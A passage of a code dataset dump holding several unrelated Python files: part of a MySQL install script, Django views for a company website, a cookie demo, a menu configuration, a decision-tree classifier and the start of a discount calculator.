mysql_data_dir = 'chown -R mysql:mysql /data/mysql/{}/'.format(port)\n print (mysql_data_dir)\n (status, output) = subprocess.getstatusoutput(mysql_data_dir)\n if status == 0:\n print('mkdir data dir and chown mysql data dir success')\n else:\n raise Exception\n except OSError:\n print('create dir error, please check')\n\n\n# 8. Initialize the instance\ndef initialize_instance(port):\n\n pbar = ProgressBar().start()\n cmd = '/usr/local/mysql/bin/mysqld --defaults-file=/data/mysql/{}/my_3306.cnf --initialize'.format(port)\n (status, output) = subprocess.getstatusoutput(cmd)\n # print('status:', status, 'detail:', output)\n if status == 0:\n pbar.finish()\n print('Initialize finished, now read the temporary mysql login password')\n\n# 9. Take the specified my.cnf file and copy it into the data directory\n# TODO: prompt for the key parameters and generate my_$port.cnf automatically\n\ndef cp_cnf(cnf_file_path, data_path):\n if os.path.exists(cnf_file_path):\n try:\n shutil.copy(cnf_file_path, data_path)\n except OSError:\n print('copy failed, please check it')\n else:\n print('file does not exist')\n\n# 10. Extract the temporary password from the error log\ndef get_error_password(error_path):\n\n # cat /data/mysql/3306/data/error.log |grep password\n cmd = 'cat {} |grep password'.format(error_path)\n (status, output) = subprocess.getstatusoutput(cmd)\n # print('status:', status, 'detail:', output)\n if status == 0:\n lists = output.split()\n print('\\033[1;33;44m login method:\\033[0m mysql -S /data/mysql/3306/data/3306.sock -p')\n print('\\033[1;33;44m password: \\033[0m %s' % (lists[-1]))\n\n\n# 11. Install the init script\ndef start_mysql_init():\n #cp /usr/local/mysql/support-files/mysql.server /etc/init.d/mysql\n #/etc/init.d/mysql start OR /usr/local/mysql/bin/mysqld --defaults-file=/etc/my.cnf &(creates the .sock file)\n cmd = 'cp /usr/local/mysql/support-files/mysql.server /etc/init.d/mysql'\n (status, output) = subprocess.getstatusoutput(cmd)\n if status == 0:\n print('cp support-files/mysql.server to /etc/init.d/mysql success')\n\n# 12. Start the MySQL server\ndef start_mysql_server():\n #cmd = '/etc/init.d/mysql start'\n\n pbar = ProgressBar().start()\n cmd = '/usr/local/mysql/bin/mysqld --defaults-file=/data/mysql/3306/my_3306.cnf &'\n (status, output) = subprocess.getstatusoutput(cmd)\n if status == 0:\n pbar.finish()\n print('\\033[1;33;44m mysql server start success \\033[0m')\n else:\n print(output)\n\n #Starting MySQL.Logging to '/usr/local/mysql/data/mgr01.err'.\n #ERROR! 
The server quit without updating PID file (/usr/local/mysql/data/mgr01.pid).\n # note: this error means the my.cnf config file must be specified explicitly\n\ndef main():\n\n print(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n print(\"++ MySQL install start ++\")\n print(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n\n add_mysql_user()\n # input_get_version()\n wget_download()\n untar()\n base_dir_chown()\n prepare(3306)\n cp_cnf(cnf_file_path, data_path)\n initialize_instance(3306)\n get_error_password(error_path)\n start_mysql_init()\n start_mysql_server()\n\n print(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n print(\"++ MySQL install success ++\")\n print(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n\nif __name__ == '__main__':\n main()","sub_path":"install_mysql.py","file_name":"install_mysql.py","file_ext":"py","file_size_in_byte":9093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"607850601","text":"from django.shortcuts import render, get_list_or_404, get_object_or_404\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage, InvalidPage\nfrom django.http import Http404\nfrom django.db.models import F\nfrom django.http import HttpResponse\nfrom polls.form import JoinForm\nfrom .models import Products, MyNews, JoinUs, Banner, JobRequire\nfrom django.views import generic\nimport re\n\n# Site homepage (default view)\n\n\ndef index(request):\n # banner_list = get_list_or_404(Banner)[:5]\n try:\n banner_list = Banner.objects.all()[:5]\n except Banner.DoesNotExist:\n raise Http404(\"数据库不存在\")\n\n num = len(banner_list)\n\n xx = range(1, num + 1)\n\n try:\n news = MyNews.objects.order_by('date')[:4] # order by date and take the first 4 news items\n except MyNews.DoesNotExist:\n raise Http404(\"数据库不存在\")\n\n my_list = []\n\n for new in news:\n # must be (re)defined inside the loop, otherwise every entry would share one dict\n dic = dict()\n # print(new)\n dic['id'] = new.id\n dic['logo'] = new.logo # logo image path of this news item\n # print(dic['logo'])\n dic['title'] = new.tt # news title\n # print(dic['title'])\n # first characters of the body text; strip HTML tags with a regex\n txt = new.context.replace(' ', '')\n dr = re.compile(r'<[^>]+>', re.S)\n dd = dr.sub('', txt)\n dic['text'] = dd[:60]\n # print(dic)\n my_list.append(dic)\n\n # print(my_list)\n\n content = {\n 'title': '力众蓝天',\n 'banner_list': banner_list,\n 'num': xx,\n 'main': my_list[0],\n 'list': my_list[1:],\n }\n return render(request, 'polls/index/index.html', content)\n\n\n# General manager's message\ndef message(request):\n return render(request, 'polls/index/message.html', {'title': '力众蓝天'})\n\n\n# Brand story\ndef story(request):\n return render(request, 'polls/index/story.html', {'title': '品牌故事'})\n\n\n# Social responsibility\ndef social(request):\n return render(request, \"polls/index/social.html\", {'title': '社会责任'})\n\n\n# Development history\ndef develop(request):\n return render(request, \"polls/index/develop.html\", {'title': '发展历程'})\n\n\n# Corporate culture\ndef culture(request):\n return render(request, \"polls/index/culture.html\", {'title': '企业文化'})\n\n\n# HR (human resources)\ndef hr(request):\n jobs = get_list_or_404(JobRequire)\n data = {\n 'jobs': jobs,\n 'title': '人力资源'\n }\n\n return render(request, \"polls/index/HR.html\", data)\n\n\n# Corporate honors\ndef honor(request):\n return render(request, \"polls/index/honor.html\", {'title': '企业荣誉'})\n\n\n# News center\n# news_type: news category, 0: company news, 1: industry news, 2: media coverage, 3: technical exchange\ndef news_view(request, news_type):\n\n 
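# The branches below query MyNews.news_type with the same value documented in the mapping above.\n 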
if news_type == 0:\n title = \"力众蓝天新闻\"\n news_list = get_list_or_404(MyNews, news_type=0)\n elif news_type == 1:\n title = \"行业新闻\"\n news_list = get_list_or_404(MyNews, news_type=1)\n elif news_type == 2:\n title = \"媒体报导\"\n news_list = get_list_or_404(MyNews, news_type=2)\n elif news_type == 3:\n title = \"技术交流\"\n news_list = get_list_or_404(MyNews, news_type=3)\n else:\n news_list = get_list_or_404(MyNews)\n title = \"全部新闻\"\n\n news_list = mypage(news_list, request)\n\n content = {\n 'new_list': news_list,\n 'type': news_type,\n 'title': title,\n }\n return render(request, 'polls/news.html', content)\n\n\n# Default product listing; filters products by the type_num parameter and renders the list\ndef products(request, type_num):\n try:\n products_list = Products.objects.filter(type_num=type_num)\n except Products.DoesNotExist:\n raise Http404(\"Products does not exist\")\n\n products_list = mypage(products_list, request)\n\n context = {\n 'products_list': products_list,\n 'title': '产品页'\n }\n return render(request, 'polls/products.html', context)\n\n\n# Product page without arguments: show all products\ndef all_products(request):\n try:\n products_list = Products.objects.all()\n except Products.DoesNotExist:\n raise Http404(\"Products does not exist\")\n\n products_list = mypage(products_list, request)\n\n context = {\n 'products_list': products_list,\n\n 'title': '产品页',\n }\n return render(request, 'polls/products.html', context)\n\n\n# Product detail page\n# Shows the detail page for a single product\n# pk: product id\ndef detail(request, pk):\n print(\"------------ product id %s\" % pk)\n try:\n product = Products.objects.get(pk=pk)\n product.read_count = F('read_count') + 1\n product.save()\n product.refresh_from_db()\n except Products.DoesNotExist:\n raise Http404(\"Product does not exist\")\n title = \"产品详情页\"\n content = {\n 'product': product,\n 'title': title,\n }\n print(content)\n return render(request, 'polls/detail.html', content)\n\n\n# Contact page\ndef contact(request):\n return render(request, 'polls/ContactUs.html')\n\n\n# News detail page\ndef news_detail(request, pk):\n try:\n new = MyNews.objects.get(pk=pk)\n except MyNews.DoesNotExist:\n raise Http404(\"该新闻已过期!\")\n title = \"新闻详情页\"\n content = {\n 'new': new,\n 'title': title,\n }\n return render(request, 'polls/detail.html', content)\n\n\n# Solution detail page\ndef solution(request, pk):\n solu = get_object_or_404(Products, pk=pk)\n title = \"解决方案\"\n content = {\n 'product': solu,\n 'title': title,\n }\n return render(request, \"polls/detail.html\", content)\n\n\n# Solution list\ndef solution_list(request):\n s_list = get_list_or_404(Products, is_solu=1) # is_solu=1 selects solutions\n\n print(s_list)\n if not s_list:\n raise Http404(\"数据为空\")\n\n s_list = mypage(s_list, request)\n\n title = \"解决方案列表\"\n content = {\n 'products_list': s_list,\n 'title': title,\n\n }\n return render(request, \"polls/products.html\", content)\n\n\n# Show solutions by category\n# Solution categories: 0: invalid, 1: SCR system, 2: fuel system, 3: lubrication system, 4: EGR system\ndef solution_class(request, classify):\n\n products_list = get_list_or_404(Products, classify=classify)\n\n title = ''\n\n if classify == 1: # SCR system solutions\n title = 'SCR系统解决方案'\n elif classify == 2:\n title = '燃油系统解决方案'\n elif classify == 3:\n title = '润滑系统决方案'\n elif classify == 4:\n title = 'EGR系统解决方案'\n products_list = mypage(products_list, request)\n\n content = {\n 'products_list': products_list,\n 'title': title,\n }\n\n return render(request, \"polls/products.html\", content)\n\n\n# Investment/franchise page\ndef business(request):\n if request.method == 'POST':\n jon = JoinForm(request.POST)\n if jon.is_valid():\n print(jon.cleaned_data)\n else:\n print(jon.errors)\n else:\n jon = JoinForm()\n content = {\n 'form': jon.as_p(),\n 'title': '招商加盟',\n }\n return render(request, \"polls/business.html\", content)
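\n# Added note: is_valid() only inspects *bound* data, so the POST branch above must build\n# JoinForm(request.POST); an unbound JoinForm() would always fail validation.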
\n\n\n# Form submission handler\ndef submit_process(request):\n po = request.POST\n print(po)\n # todo\n n = JoinUs()\n n.product = po.get(\"product_name\")\n n.area = po.get(\"area\")\n n.name = po.get(\"name\")\n n.tel = po.get(\"tel\")\n\n n.save()\n\n mess = {\n 'title': '感谢',\n 'message': '信息已经提交,感谢您的关注!',\n }\n\n return render(request, \"polls/Tools/Message.html\", mess)\n\n\n# Pagination helper\n# products_list: the queryset/list to paginate\n#\ndef mypage(products_list, request):\n\n paginator = Paginator(products_list, 30)\n\n if request.method == \"GET\":\n # read the page parameter from the URL; the first page carries no page parameter, so default to 1\n page = request.GET.get('page')\n try:\n products_list = paginator.page(page)\n # EmptyPage and PageNotAnInteger both subclass InvalidPage, so InvalidPage must be caught last\n except PageNotAnInteger:\n # if the requested page number is not an integer, return the first page\n products_list = paginator.page(1)\n except EmptyPage:\n # if the requested page is outside the valid range, return the last page of results\n products_list = paginator.page(paginator.num_pages)\n except InvalidPage:\n # any other invalid page request\n return HttpResponse('找不到页面的内容')\n\n return products_list\n\n\n# Service philosophy\ndef service(request):\n\n return render(request, \"polls/service.html\", {'title': '服务理念'})\n\n\n# todo\n# Admin page listing the franchise (JoinUs) submissions\nclass MyListView(generic.ListView):\n template_name = 'admin/JoinUsList.html'\n\n def get_queryset(self):\n return JoinUs.objects.all()\n","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"59116059","text":"# /usr/bin/env python\n# -*- coding:utf-8 -*-\n# date:31/7/2016\n\n'''\nA quick demo of obtaining a CookieJar instance\n'''\n\nimport urllib,urllib2,cookielib\n\n# get a CookieJar object (holds this machine's cookie data)\ncj = cookielib.CookieJar()\n# build a custom opener bound to the CookieJar object\nopener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))\n# install the opener; subsequent urlopen() calls all use the installed opener\nurllib2.install_opener(opener)\n\nurl = 'http://www.baidu.com'\n\nprint(urllib2.urlopen(url))\nprint('------------------------')\nprint(cj)","sub_path":"cookielib/cookie.py","file_name":"cookie.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"143458720","text":"# -*- coding: utf-8 -*-\n\nfmi_edit = {\"menu_id\": \"edit_menu_item\", \"menu_text\": \"Pas aan\", \"route\": \"edit\", \"flags\": [\"id_required\"]}\nfmi_delete = {\"menu_id\": \"delete_menu_item\", \"menu_text\": \"Verwijder\", \"route\": \"delete\",\n \"message\" : \"Zeker dat u dit item wil verwijderen\", \"flags\": [\"id_required\", \"confirm_before_delete\"]}\nfmi_copy = {\"menu_id\": \"copy_menu_item\", \"menu_text\": \"Kopieer van\", \"route\": \"add\", \"flags\": [\"id_required\"]}\nfmi_add = {\"menu_id\": \"add_menu_item\", \"menu_text\": \"Voeg toe\", \"route\": \"add\", \"flags\": []}\nfmi_view = {\"menu_id\": \"view_menu_item\", \"menu_text\": \"Details\", \"route\": \"view\", \"flags\": [\"id_required\"]}\nfmi_change_pwd = {\"menu_id\": \"change_pwd_menu_item\", \"menu_text\": \"Verander paswoord\", \"route\": \"change_pwd\",\"flags\": [\"id_required\"]}\nfmi_update_rfid = {\"menu_id\": \"update_rfid_menu_item\", \"menu_text\": \"Nieuwe code\", \"route\": \"new_rfid\",\"flags\": [\"bootbox_single\"]}\nfmi_delete_rfid = {\"menu_id\": \"delete_rfid_item\", \"menu_text\": \"Verwijder code\", \"route\": \"delete_rfid\",\n \"message\" : \"Zeker dat u deze rfid code wil verwijderen?\", \"flags\": [\"confirm_before_delete\"]}\nfmi_delete_time_ran = {\"menu_id\": \"delete_time_ran_menu_item\", \"menu_text\": \"verwijder gelopen tijd\", \"route\": \"delete_time_ran\",\n \"message\" : \"Zeker dat u deze tijd wil verwijderen?\",\"flags\": [\"confirm_before_delete\"]}
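\n# Added note: each fmi_* dict above describes one floating-menu entry -- menu_id (DOM id),\n# menu_text (label), route (target view), an optional confirmation message, and flags\n# (e.g. id_required, confirm_before_delete) presumably interpreted by the front end.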
\n\ndefault_menu_config = [\n fmi_edit,\n fmi_copy,\n fmi_add,\n fmi_view,\n fmi_delete\n]\n\nuser_menu_config = [\n fmi_edit,\n fmi_change_pwd\n]\n\nadmin_menu_config = [\n fmi_edit,\n fmi_copy,\n fmi_add,\n fmi_view,\n fmi_delete,\n fmi_change_pwd\n]\n\noffence_menu_config = [\n fmi_delete\n]\n\nregister_runner_menu_config = [\n fmi_update_rfid,\n fmi_delete_rfid,\n fmi_delete_time_ran\n]","sub_path":"app/floating_menu.py","file_name":"floating_menu.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"637801771","text":"import pandas as pd\nimport math\n\n\ndef getEntropy(data):\n contents = list(data.groupby(\"Play\").size()) # change accordingly\n total = sum(contents)\n if len(contents) == 1:\n return 0\n # binary Shannon entropy: -(p0*log2(p0) + p1*log2(p1))\n entropy = -1 * (((contents[0]/total) * math.log2(contents[0]/total)) +\n ((contents[1]/total) * math.log2(contents[1]/total)))\n return entropy\n\n\ndef calculateColumnEntropy(data, column):\n attributes = set(data[column])\n attributeCount = data.groupby(column).size()\n entropy = 0\n for attribute in attributes:\n current_entropy = getEntropy(data.query(\n column + \" == '\" + attribute + \"'\"))\n entropy += attributeCount[attribute] / \\\n sum(attributeCount) * current_entropy\n return entropy\n\n\ndef getTree(data):\n tree = {}\n rootEntropy = getEntropy(data)\n if rootEntropy == 0:\n return data[\"Play\"].iloc[0] # change accordingly\n\n leastEntropy = float('inf') # sentinel: any real column entropy is smaller\n root = None\n\n columns = list(data.columns)\n columns.remove(\"Play\") # change accordingly\n for column in columns:\n entropy = calculateColumnEntropy(data, column)\n if entropy < leastEntropy:\n leastEntropy = entropy\n root = column\n\n subTree = {}\n for attribute in set(data[root]):\n subTree[attribute] = getTree(\n data.query(root + \"== '\" + attribute + \"'\"))\n\n tree[root] = subTree\n return tree\n\n\ndef get_decision(query, tree, nodes):\n if type(tree) == dict:\n node = list(tree.keys())[0]\n node_index = nodes.index(node)\n attribute = query[node_index]\n return get_decision(query, tree[node][attribute], nodes)\n return tree\n\n\nif __name__ == '__main__':\n data = pd.read_csv(\"data.csv\", dtype=\"str\")\n tree = getTree(data)\n print(tree)\n query = tuple(input(\"Query: \").strip(\" \").split(\",\"))\n print(get_decision(query, tree, list(data.columns.values[:-1])))\n","sub_path":"6th Semester/AI/10 - Decision tree/DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"621473567","text":"import math\nnombres_productos=[]\ncantidad=[]\nprecios=[]\nsubtotal=[]\nbandera=True\n\nwhile bandera:\n entrada=input()\n comando=entrada.split(\"&\")\n item=comando[0]\n if item==str(1):\n articulo=comando[1]\n cant=int(comando[2])\n precio=int(comando[3])\n sub=(cant*precio)\n nombres_productos.append(articulo)\n cantidad.append(cant)\n precios.append(precio)\n subtotal.append(sub)\n elif item==str(2):\n cedula=comando[1]\n total=sum(subtotal)\n if total<150000:\n descuento=0\n elif 150000<=total<=300000:\n descuento = total*0.1\n elif 300000